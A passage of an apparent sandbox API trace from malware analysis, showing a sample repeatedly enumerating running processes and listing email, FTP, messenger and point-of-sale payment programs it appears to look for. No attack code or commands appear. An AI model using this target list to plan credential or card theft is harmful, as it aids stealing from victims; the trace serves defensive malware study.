hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0240.337] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0240.376] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0240.378] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0240.380] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0240.382] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0240.384] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0240.390] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0240.392] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0240.394] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0240.396] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0240.398] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0240.400] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0240.405] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0240.407] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0240.409] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0240.412] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0240.414] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0240.416] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0240.439] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0240.441] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0240.444] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0240.446] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0240.448] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0240.453] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0240.455] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0240.457] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0240.459] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0240.461] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0240.463] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0240.468] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0240.470] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0240.472] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0240.474] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0240.476] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0240.478] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0240.546] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0240.548] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0240.550] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0240.551] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.552] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.554] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.556] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0240.560] CloseHandle (hObject=0x1b08) returned 1 [0240.560] Sleep (dwMilliseconds=0x64) [0240.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0240.682] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.686] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0240.687] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0240.689] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.690] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0240.692] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.693] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0240.695] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0240.697] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0240.698] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.703] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.704] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0240.706] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.708] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.709] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.711] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.712] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.737] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.739] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.740] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0240.741] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0240.743] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0240.744] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.746] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.747] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0240.749] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0240.750] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0240.752] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0240.753] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.755] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0240.756] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.757] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.759] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.760] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0240.762] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0240.763] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0240.765] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0240.766] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0240.767] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0240.769] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0240.770] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, 